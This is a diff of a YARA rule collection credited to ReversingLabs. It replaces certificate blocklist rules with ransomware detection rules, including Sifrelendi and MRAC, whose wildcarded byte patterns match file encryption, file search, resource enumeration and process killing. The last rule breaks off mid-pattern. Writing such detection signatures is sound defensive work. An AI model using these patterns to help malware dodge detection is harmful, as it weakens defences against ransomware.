+            ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C9 89 4D ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ??
+            8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? C7 45 ?? ?? ?? ?? ?? 33 C0 89 45 ?? 0F 57
+            C0 66 0F 13 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 8B 95 ?? ?? ??
+            ?? 83 D2 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 0F 8F ??
+            ?? ?? ?? 7C ?? 8B 8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ??
+            6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ??
+            C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ??
+            6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15
+            ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
+        }
+		$encrypt_files_p2 = {
+            8A 45 ?? E9 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15
+            ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
+            8A 45 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 05 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 4D ?? E8 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 50 6A ?? 8B 4D ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 75 ??
+            C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ??
+            6A ?? 8D 45 ?? 50 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 55 ?? 52 FF 15
+            ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
+            8A 45 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? EB ?? E9 ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4D ?? 8B 95 ??
+            ?? ?? ?? 89 55 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ??
+            ?? ?? 89 4D ?? 8B 95 ?? ?? ?? ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52
+        }
+		$encrypt_files_p3 = {
+            8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 8D ?? ??
+            ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 55
+            ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ??
+            ?? ?? 39 45 ?? 0F 85 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 4D ??
+            89 4D ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 52 8B
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 89
+            45 ?? 8B 45 ?? 89 45 ?? 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ??
+            ?? ?? 85 C0 74 ?? 83 7D ?? ?? 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 8A 45 ?? EB ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8A 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D
+            C2
+        }
+		$search_files_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 45 ?? 53 8B 5D
+            ?? 56 89 8D ?? ?? ?? ?? 8B 4D ?? 57 89 8D ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 83
+            7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 72 ?? 8B
+            45 ?? 33 F6 8D 8D ?? ?? ?? ?? 56 56 56 51 56 50 FF 15 ?? ?? ?? ?? 8B F8 8B 85 ?? ??
+            ?? ?? 83 FF ?? 75 ?? C7 00 ?? ?? ?? ?? 33 C0 66 89 03 EB ?? 6A ?? 89 30 58 66 39 85
+            ?? ?? ?? ?? 75 ?? 66 39 B5 ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 B5 ??
+            ?? ?? ?? 75 ?? 8B 8D ?? ?? ?? ?? 51 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 66 39 33 75 ?? 57
+            FF 15 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 89 01 8B F7 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ??
+            8B C6 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+		$search_files_2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 8D 85 ?? ?? ??
+            ?? 56 8B 75 ?? 57 8B 7D ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 58 66 39 85 ??
+            ?? ?? ?? 75 ?? 66 83 BD ?? ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 66 83 BD ??
+            ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 58 75 ?? 68
+            ?? ?? ?? ?? 56 C7 03 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B 4D ?? 5F 5E 33 CD 5B E8 ??
+            ?? ?? ?? C9 C3 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 03 8D 85 ?? ?? ?? ?? 50 56 E8 ??
+            ?? ?? ?? 83 C4 ?? EB
+        }
+		$enum_resources = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 33 C0 89 45 ?? 66 89 45 ?? B9 ?? ?? ??
+            ?? 6B D1 ?? 66 8B 45 ?? 66 89 44 15 ?? B9 ?? ?? ?? ?? C1 E1 ?? BA ?? ?? ?? ?? 66 89
+            54 0D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51
+            6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 33 C0 66 89 45 ?? 8D
+            4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 00 89 45 ?? 8D 4D ?? 51 8D 55 ?? 52
+            8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 08 51 8D 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 8B 08 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 00 89 45 ?? 8B 4D ?? 51 8B
+            55 ?? 52 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50
+            8B 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 64 89 0D ?? ?? ??
+            ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$kill_processes = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 C0 88 85 ?? ?? ??
+            ?? 8B 4D ?? E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
+            8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 8D 4D
+            ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 95 ?? ??
+            ?? ?? 85 D2 74 ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B0 ?? EB ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51
+            FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 32
+            C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$kill_processes_call = {
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ??
+            89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 3B 95 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
+        }
+		$enum_resources_call = {
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ??
+            8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B C8 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51 8D 4D ?? E8 ??
+            ?? ?? ?? 8D 55 ?? 89 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PORT-SERVIS LTD, TOV" and pe.signatures [ i ] . serial == "06:e8:42:d3:ea:62:49:d7:83:d6:b5:5e:29:c0:60:c7" and 1565568000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $kill_processes_call ) and ( $kill_processes ) and ( $enum_resources ) and ( all of ( $search_files_* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $enum_resources_call )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_06473C3C19D9E1A9429B58B6Faec2967 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Sifrelendi : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Sifrelendi ransomware."
 		author = "ReversingLabs"
-		id = "01eba681-8c98-5553-b369-941b6dba11e2"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "b9083b7c-eb09-52da-a240-39b51df892f9"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3544-L3560"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f9ca49ce65d213dce803806956c0ce1da0c4068bea173daae9cb06dab0a86268"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Sifrelendi.yara#L1-L67"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "430d3877c10c86fcb19b5624dd8886d61e54ccd0453678329309b49712c6d5c6"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Sifrelendi"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_files = {
+            E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 85 ?? ?? ??
+            ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
+            89 20 F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74
+            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 8D ??
+            ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 EB
+            ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D
+            C3
+        }
+		$encrypt_files = {
+            55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64
+            FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C9 B2 ?? A1 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B F8 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B C7 E8 ?? ?? ?? ?? 33 C9 B2
+            ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ??
+            ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B 45
+            ?? 8B 10 FF 12 50 8B CB 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? 6A ?? 6A
+            ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 8B 10 FF 12 50 8B 4D ?? 8B D3 8B C7 E8 ?? ?? ?? ?? 8B
+            C7 8B 10 FF 52 ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? 8D 45
+            ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digital Leadership Solutions Limited" and pe.signatures [ i ] . serial == "06:47:3c:3c:19:d9:e1:a9:42:9b:58:b6:fa:ec:29:67" and 1581984001 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $search_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_39F56251Df2088223Cc03494084E6081 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_MRAC : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects MRAC ransomware."
 		author = "ReversingLabs"
-		id = "0c475e89-9729-53b9-a301-7a9faa0fef91"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "135c3dc9-bf08-5f00-bade-7054d9f33830"
+		date = "2022-02-21"
+		modified = "2022-02-21"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3562-L3578"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c87850f91758a5bb3bdf6f6d7de9a3f53077d64cebdde541ac0742d3cea4f4e0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.MRAC.yara#L1-L69"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "04e8364dc9c726f4bb2d3035e5b7e8dab4cae124b2f047be6f11b865fab557a7"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "MRAC"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            B8 ?? ?? ?? ?? 66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ??
+            83 C1 ?? 83 C0 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 8B 75 ?? 85 C0 75 ?? B1
+            ?? EB ?? 32 C9 8B 45 ?? 88 4D ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ?? ?? ?? 8B C6 81 F9 ??
+            ?? ?? ?? 72 ?? 8B 76 ?? 83 C1 ?? 2B C6 83 C0 ?? 83 F8 ?? 77 ?? 51 56 E8 ?? ?? ?? ??
+            8A 4D ?? 83 C4 ?? 8A C1 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ??
+            ?? ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? E8
+        }
+		$import_key = {
+            8D 45 ?? 50 6A ?? 6A ?? 6A ?? FF 75 ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 89 45 ?? 8D 4D ?? 51 50 6A ?? 6A ?? FF 75 ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 75 ?? FF
+            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF
+            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? FF
+            75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF D6 85 C0 0F
+            84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15
+            ?? ?? ?? ?? 8B C8 F6 C1 ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 C1 E8 ?? 40 C1 E0 ?? 2B
+            C1 68 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 6A
+            ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            8B 45 ?? 3D ?? ?? ?? ?? 0F 92 C3 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 57 6A ?? 0F
